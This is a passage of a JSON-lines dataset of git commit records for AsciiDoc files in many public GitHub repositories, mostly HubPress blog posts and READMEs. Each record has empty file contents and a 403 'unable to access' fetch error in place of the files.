2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e7ac3b0dfaf719ec75a4eb580b6daabf8f098e4","subject":"Update 2018-07-03-vr-lt.adoc","message":"Update 2018-07-03-vr-lt.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-03-vr-lt.adoc","new_file":"_posts\/2018-07-03-vr-lt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e69d041712b9e7b8473475d7362bc1dd0b22c93","subject":"Update 2018-06-14-Microsecond-latency-Microservice-Benchmarked.adoc","message":"Update 2018-06-14-Microsecond-latency-Microservice-Benchmarked.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-06-14-Microsecond-latency-Microservice-Benchmarked.adoc","new_file":"_posts\/2018-06-14-Microsecond-latency-Microservice-Benchmarked.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b7b260a84db0cd830df387895ebe4e8428b3b2e","subject":"Added references","message":"Added references\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7144cc2aec8bc81ad084c705dbe1dc3430577248","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/the_city.adoc","new_file":"content\/writings\/the_city.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"013b91ae1b2110568954b5397ed8305eac3a7321","subject":"Update 2015-03-23-Enhancing-HubPress-Documentation.adoc","message":"Update 2015-03-23-Enhancing-HubPress-Documentation.adoc","repos":"luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2015-03-23-Enhancing-HubPress-Documentation.adoc","new_file":"_posts\/2015-03-23-Enhancing-HubPress-Documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f69aeb7d0d84681c13a2f78017bbc825ae1b1c50","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82c63e6d49c5bffda94eee5194a3ffca5c82db98","subject":"Update 2016-01-05-Letter-to-My-Eight-Year-Old-Self.adoc","message":"Update 2016-01-05-Letter-to-My-Eight-Year-Old-Self.adoc","repos":"blackGirlsCode\/blog,blackGirlsCode\/blog,blackGirlsCode\/blog","old_file":"_posts\/2016-01-05-Letter-to-My-Eight-Year-Old-Self.adoc","new_file":"_posts\/2016-01-05-Letter-to-My-Eight-Year-Old-Self.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackGirlsCode\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78f453b90e3083e46696c70421692e84867f76d9","subject":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","message":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3466c3d6f179916db10096139f0582a3984484b4","subject":"Update 2015-02-15-Eclipse-Tips-001-raccourcir-le-temps-de-lancement.adoc","message":"Update 2015-02-15-Eclipse-Tips-001-raccourcir-le-temps-de-lancement.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2015-02-15-Eclipse-Tips-001-raccourcir-le-temps-de-lancement.adoc","new_file":"_posts\/2015-02-15-Eclipse-Tips-001-raccourcir-le-temps-de-lancement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3d22c8309c1186206281529b73a762f95f44285","subject":"Naming","message":"Naming\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Maven.adoc","new_file":"Best practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2488e737ad8f583c785c2a31f4dc0fadf37a5a13","subject":"add news item about new site","message":"add news item about new site\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2016\/01\/14\/clojure-org-live.adoc","new_file":"content\/news\/2016\/01\/14\/clojure-org-live.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4c3f9a0b241fd1494d435d39cf533e1294292f7f","subject":"Update 2015-06-04-3d-Prirazlomnaya-Making-Of.adoc","message":"Update 2015-06-04-3d-Prirazlomnaya-Making-Of.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-04-3d-Prirazlomnaya-Making-Of.adoc","new_file":"_posts\/2015-06-04-3d-Prirazlomnaya-Making-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bbd3ca52d3bade43891855a1571f1a4e4f14e37","subject":"Update 2019-05-29-Could-you-find-some-chains.adoc","message":"Update 2019-05-29-Could-you-find-some-chains.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2019-05-29-Could-you-find-some-chains.adoc","new_file":"_posts\/2019-05-29-Could-you-find-some-chains.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6c3eb8074d9965851fd19052a0f4528ef09a120","subject":"add first draft of cache comparison","message":"add first draft of cache comparison\n","repos":"cache2k\/cache2k,cache2k\/cache2k,cache2k\/cache2k","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_comparison.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cache2k\/cache2k.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f99b25cc0ea5fb51019bdad8775b7741ea7e13f","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d2c51979fbf3d53f7c842344dd8f9a0ceef43b6","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ce380d0115b396af7ec4d689c76831d36e50781","subject":"add system packages","message":"add system packages\n","repos":"ttroy50\/cmake-examples,ttroy50\/cmake-examples,ttroy50\/cmake-examples","old_file":"07-package-management\/A-using-system-provide-packages\/README.adoc","new_file":"07-package-management\/A-using-system-provide-packages\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ttroy50\/cmake-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55e903056e40322fceaf30d4199f4349c75b6702","subject":"doc: users: add TM example","message":"doc: users: add TM example\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,dkrot\/odp,nmorey\/odp,nmorey\/odp,erachmi\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,dkrot\/odp,erachmi\/odp,mike-holmes-linaro\/odp,dkrot\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,dkrot\/odp,ravineet-singh\/odp,nmorey\/odp","old_file":"doc\/users-guide\/users-guide-tm.adoc","new_file":"doc\/users-guide\/users-guide-tm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"fe40174e577e583951983e8db75f6e8496558035","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39c1dd085a7217a4233f1abee442e80c216e1fd5","subject":"[DOCS] Added link to security commands","message":"[DOCS] Added link to security commands\n\nOriginal commit: elastic\/x-pack-elasticsearch@168167517ba22aae73955690db552350e1eb67d7\n","repos":"gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/en\/security\/reference.asciidoc","new_file":"docs\/en\/security\/reference.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7903ecc207ca9e784d7c964925ad2f6b074900b8","subject":"Update 2017-07-07-Gameplay-Mah-Rocks.adoc","message":"Update 2017-07-07-Gameplay-Mah-Rocks.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-07-07-Gameplay-Mah-Rocks.adoc","new_file":"_posts\/2017-07-07-Gameplay-Mah-Rocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9a3c122f5327d94efb60fb0a7f07226977415c4","subject":"added xml file snippet in docs","message":"added xml file snippet in docs\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,atuljangra\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"docs\/loadxml.adoc","new_file":"docs\/loadxml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inserpio\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60cae2f0db2936f370fb45249568cb3ea3c4f317","subject":"y2b create post BlackBerry Playbook Unboxing","message":"y2b create post BlackBerry Playbook Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-19-BlackBerry-Playbook-Unboxing.adoc","new_file":"_posts\/2011-04-19-BlackBerry-Playbook-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6a6383631f975e8587cb0cefa657489abfc30a2","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6aaf4a0a8b0f86fe8d615f0efb2b0c113345662","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f80a8f3e4b22347603b7d234b1edb02a05acb3b7","subject":"Update 2017-07-15-why-we-must-organize2.adoc","message":"Update 2017-07-15-why-we-must-organize2.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-15-why-we-must-organize2.adoc","new_file":"_posts\/2017-07-15-why-we-must-organize2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35ece479cb5186a4c7e6aef1e18bc36de3006369","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fec8b34f122c94d9a462b55af15a956579b4baa3","subject":"Update 404.adoc","message":"Update 404.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/404.adoc","new_file":"_posts\/404.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d08651694c18d39ea3f04f2d0ba646dd0edf6a9","subject":"Python: install NymPy and Scipy","message":"Python: install NymPy and Scipy\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a937c51976a81985e84f7b1700de9baf084183f1","subject":"Now hosted on GitLab","message":"Now hosted on GitLab\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-test,sdavids\/sdavids-commons-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"270d0f5219f62fde30a2eb8338e6aae27389f30e","subject":"README: Use an external resource for Git commit message formating.","message":"README: Use an external resource for Git commit message formating.\n\nThis section was rather bulky. I have my doubts of people using it\nfor reference, but I'd rather have it here than not at all.\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"21830e815d82384e3519905e25ca3631541fec59","subject":"readme","message":"readme\n","repos":"katheris\/microprofile-conference,karianna\/microprofile-conference,katheris\/microprofile-conference,AndyGee\/microprofile-conference,microprofile\/microprofile-conference,iainduncani\/microprofile-conference,katheris\/microprofile-conference,katheris\/microprofile-conference,katheris\/microprofile-conference,karianna\/microprofile-conference,iainduncani\/microprofile-conference,AndyGee\/microprofile-conference,microprofile\/microprofile-conference,AndyGee\/microprofile-conference,iainduncani\/microprofile-conference,karianna\/microprofile-conference,iainduncani\/microprofile-conference,iainduncani\/microprofile-conference,AndyGee\/microprofile-conference,microprofile\/microprofile-conference,microprofile\/microprofile-conference,AndyGee\/microprofile-conference,karianna\/microprofile-conference,karianna\/microprofile-conference,microprofile\/microprofile-conference","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AndyGee\/microprofile-conference.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a621de2d50c1fa42a019a3104574493e1c15043e","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"bc0480566985a4eb4005f4dc8a7ba3d82fe153a2","subject":"Updated documentation","message":"Updated documentation","repos":"storozhukBM\/javaslang-circuitbreaker,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,goldobin\/resilience4j,mehtabsinghmann\/resilience4j,RobWin\/circuitbreaker-java8,drmaas\/resilience4j,drmaas\/resilience4j,RobWin\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cdd74f66dcd7e49a984bc04531a4011f59dfff18","subject":"Add note to README","message":"Add note to README\n\nSigned-off-by: Alexandre Montplaisir <0b9d8e7da097b5bbfe36e48cca5acfe475f18227@efficios.com>\n","repos":"lttng\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lttng\/lttng-scope.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"12ec18ebc43fc79ee8efeebf86d57fd599a2fd6b","subject":"Add .adoc symlink for Github.","message":"Add .adoc symlink for Github.\n","repos":"Yubico\/yubikey-manager,Yubico\/yubikey-manager","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubikey-manager.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"647528594b4051f2cd068131a52f66549d5e1539","subject":"Update 2015-09-17-first-commit.adoc","message":"Update 2015-09-17-first-commit.adoc","repos":"popurax\/popurax.github.io,popurax\/popurax.github.io,popurax\/popurax.github.io","old_file":"_posts\/2015-09-17-first-commit.adoc","new_file":"_posts\/2015-09-17-first-commit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/popurax\/popurax.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"476284c155dca4997e324a9eb9d6c4d2248ccd1a","subject":"y2b create post Corsair Vengeance M90 Unboxing (Gaming Mouse - UGPC 2012)","message":"y2b create post Corsair Vengeance M90 Unboxing (Gaming Mouse - UGPC 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-08-09-Corsair-Vengeance-M90-Unboxing-Gaming-Mouse--UGPC-2012.adoc","new_file":"_posts\/2012-08-09-Corsair-Vengeance-M90-Unboxing-Gaming-Mouse--UGPC-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e5d19f37eb2e351a6edaf04c1049666bc7fa22c","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17144979c418ed629c9893df5087c637c70110a2","subject":"Update 2015-04-29-Test.adoc","message":"Update 2015-04-29-Test.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-04-29-Test.adoc","new_file":"_posts\/2015-04-29-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bd930601562f55186360ceb7ba464015de56187","subject":"Update 2015-08-19-Test.adoc","message":"Update 2015-08-19-Test.adoc","repos":"jiashengc\/blog,jiashengc\/blog,jiashengc\/blog","old_file":"_posts\/2015-08-19-Test.adoc","new_file":"_posts\/2015-08-19-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jiashengc\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd1988396a62d728c080129c2add00bb0e0abd85","subject":"Update 2015-01-31-first-title.adoc","message":"Update 2015-01-31-first-title.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2015-01-31-first-title.adoc","new_file":"_posts\/2015-01-31-first-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c940b138f0e4dff5b8ecb9b5d7579e67f41baafe","subject":"Update 2017-02-17-jquery-xxxx.adoc","message":"Update 2017-02-17-jquery-xxxx.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-17-jquery-xxxx.adoc","new_file":"_posts\/2017-02-17-jquery-xxxx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"553eb2d0e3cf5c6b1557288e5662bffbf3df5c2d","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/SysCache.asciidoc","new_file":"documentation\/SysCache.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65f2cd348dc8b56caf63629734c2443f82135651","subject":"moved the arch doc under docs","message":"moved the arch 